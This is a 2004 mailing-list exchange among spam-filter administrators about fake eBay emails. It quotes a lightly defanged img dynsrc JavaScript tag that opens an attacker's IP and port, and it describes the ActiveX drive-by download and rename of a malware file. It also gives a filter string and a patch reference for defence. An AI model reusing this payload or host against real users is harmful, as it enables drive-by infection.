Good tip! This is what the web page is using:
http://netsecurity.about.com/cs/generalsecurity/a/aa021504.htm to download a file it creates called C:\Program Files\Internet Explorer\Iesearch.exe by downloading and rename the file http://68.192.132.122:8067/mstasks.dat which my latest Trend Micro OfficeScan has never seen before. Here's a copy of the original 'sploit: http://www.securityfocus.com/archive/1/358913 and yes, there is a patch. It is: http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx which was part of the April Critical Patch update. Oh, and the website is hosted at: ool-44c0847a.dyn.optonline.net so this is a zombie running a webserver on somebody's home machine. Andrew 8) -----Original Message----- From: Adrian Hauri [mailto:[EMAIL PROTECTED] Sent: Tuesday, April 20, 2004 9:34 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Declude.JunkMail] Dangerous img dynsrc tag in body Just for your information: We received a couple of Spam emails (fake ebay notifications) with the following dangerous tag in the body: <img dynsrc=javascript:window.open('http://68.192.132.122_:8067/')> (I added the _ at the end so it doesn't harm anyone) As soon as you open the email, the window will open the url. The website hosts a dangerous ActiveX script that gets executed as soon as you open the website. The Antivirus(F-prot, AVG, McAfee) did not find a virus in the email and let it through because it's just a html tag. I added a body filter that searches for "<img dynsrc=javascript:window.open(" and trash all emails based on that. Adrian --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.JunkMail". The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.JunkMail". The archives can be found at http://www.mail-archive.com.
